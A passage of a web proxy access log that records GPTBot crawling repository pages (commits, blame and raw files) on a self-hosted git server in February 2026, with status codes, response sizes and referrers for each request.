(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10377] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" -[17/Feb/2026:14:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9851] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9851] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" -[17/Feb/2026:14:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9857] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" -[17/Feb/2026:14:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9860] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9851] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" [Client 74.7.227.38] [Length 22469] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" -[17/Feb/2026:14:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues" [Client 74.7.227.38] [Length 10101] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:14:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" -[17/Feb/2026:14:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 14029] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9969] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" -[17/Feb/2026:14:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10006] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" -[17/Feb/2026:14:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13073] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" -[17/Feb/2026:14:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13131] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12327] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" -[17/Feb/2026:14:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 17036] [Gzip 8.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12322] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" -[17/Feb/2026:14:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13080] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" -[17/Feb/2026:14:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones" [Client 74.7.227.38] [Length 8462] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:14:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 25025] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" [Client 74.7.227.38] [Length 334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" -[17/Feb/2026:14:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot.rss" [Client 74.7.227.38] [Length 7854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:14:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:14:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12855] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11665] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11663] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12856] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" -[17/Feb/2026:14:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:14:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" [Client 74.7.227.38] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" -[17/Feb/2026:14:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:14:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" [Client 74.7.227.38] [Length 10531] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:14:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=docker-compose.yml" [Client 74.7.227.38] [Length 18686] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:14:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11479] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9507] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:14:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10933] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:14:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" -[17/Feb/2026:14:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" -[17/Feb/2026:14:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" -[17/Feb/2026:14:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" -[17/Feb/2026:14:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:14:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" -[17/Feb/2026:14:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 